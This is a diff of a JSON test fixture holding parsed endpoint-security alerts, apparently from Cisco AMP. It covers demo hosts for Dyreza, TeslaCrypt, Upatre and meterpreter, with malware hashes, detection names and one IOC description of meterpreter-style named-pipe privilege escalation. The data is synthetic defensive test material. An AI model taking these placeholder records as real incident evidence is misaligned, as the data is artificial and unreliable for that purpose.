- ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258014979293255", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 581000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258014979293000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 255197, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:17.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257963439685702", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 569000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176257963439686000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 256516, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:12:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667579691532307", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 778000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 900000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533667579691532000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "event.id": 6180341055704007000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 257835, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 22893, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -4353,64 +700,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55807, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:12:52.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667575396565008", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006658", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 971000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 869000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533667575396565000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 261804, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 24346, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -4418,61 +772,61 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55806, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:12:49.000Z", + "@timestamp": "2021-01-15T10:32:58.000Z", + "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "27:85:29:21:67:49" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257843180601413", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "27:85:29:21:67:49" ], - "cisco.amp.timestamp_nanoseconds": 536000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 322000000, + "event.action": "Cloud IOC", "event.category": [ - "file", - "malware" + "file" ], "event.dataset": "cisco.amp", - "event.id": 6176257843180601000, + "event.id": 1476910664322001000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:32:58.000Z", + "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + "file.name": "cmd.exe", + "file.path": "/C:/WINDOWS/system32/cmd.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", + "host.name": "Demo_Command_Line_Arguments_Meterpreter", "input.type": "log", - "log.offset": 263122, + "log.offset": 25799, + "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" ], "related.hosts": [ - "Demo_Dyre" + "Demo_Command_Line_Arguments_Meterpreter" ], "related.ip": [ "8.8.8.8", @@ -4485,43 +839,66 @@ ] }, { - "@timestamp": "2021-01-15T10:12:48.000Z", + "@timestamp": "2021-01-15T10:27:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f5:8f:96:c3:53:1c" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 553648166, + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671385032556606", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f5:8f:96:c3:53:1c" + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 25000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" ], - "cisco.amp.timestamp_nanoseconds": 82375000, - "event.action": "Uninstall", "event.dataset": "cisco.amp", - "event.id": 834324, + "event.id": 6533671385032557000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 0, + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Exploit_Prevention", - "host.name": "Demo_AMP_Exploit_Prevention", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 264441, + "log.offset": 27431, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], "related.hosts": [ - "Demo_AMP_Exploit_Prevention" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4529,55 +906,50 @@ ] }, { - "@timestamp": "2021-01-15T10:12:37.000Z", + "@timestamp": "2021-01-15T10:24:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257791640993860", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "90:61:b5:c9:13:79" ], - "cisco.amp.timestamp_nanoseconds": 898000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Multiple Infected Files", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257791640994000, + "event.id": 1489955900329000200, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:24:58.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 265349, + "log.offset": 28756, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "related.hosts": [ - "Demo_Dyre" + "Demo_TeslaCrypt" ], "related.ip": [ "8.8.8.8", @@ -4590,60 +962,66 @@ ] }, { - "@timestamp": "2021-01-15T10:12:25.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257740101386307", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648309", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 901000000, + "cisco.amp.timestamp_nanoseconds": 947000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257740101386000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 266668, + "log.offset": 30055, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4651,60 +1029,64 @@ ] }, { - "@timestamp": "2021-01-15T10:12:13.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257688561778754", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648308", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 874000000, + "cisco.amp.timestamp_nanoseconds": 926000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257688561779000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 267987, + "log.offset": 31381, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4712,60 +1094,64 @@ ] }, { - "@timestamp": "2021-01-15T10:12:02.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257641317138497", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648307", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 236000000, + "cisco.amp.timestamp_nanoseconds": 533000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257641317138000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 269306, + "log.offset": 32700, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4773,7 +1159,7 @@ ] }, { - "@timestamp": "2021-01-15T10:11:52.000Z", + "@timestamp": "2021-01-15T10:22:29.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -4784,42 +1170,39 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667317698527247", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 641000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Executed malware", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667317698527000, + "event.id": 15212386047828, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "event.severity": 3, + "event.start": "2021-01-15T10:22:29.000Z", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "file.path": "file:///C%3A/ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 270625, + "log.offset": 34019, + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" ], "related.hosts": [ "Demo_AMP_Threat_Audit" @@ -4828,9 +1211,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4838,60 +1218,66 @@ ] }, { - "@timestamp": "2021-01-15T10:11:50.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257589777530944", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643250", "cisco.amp.event_type_id": 1090519054, 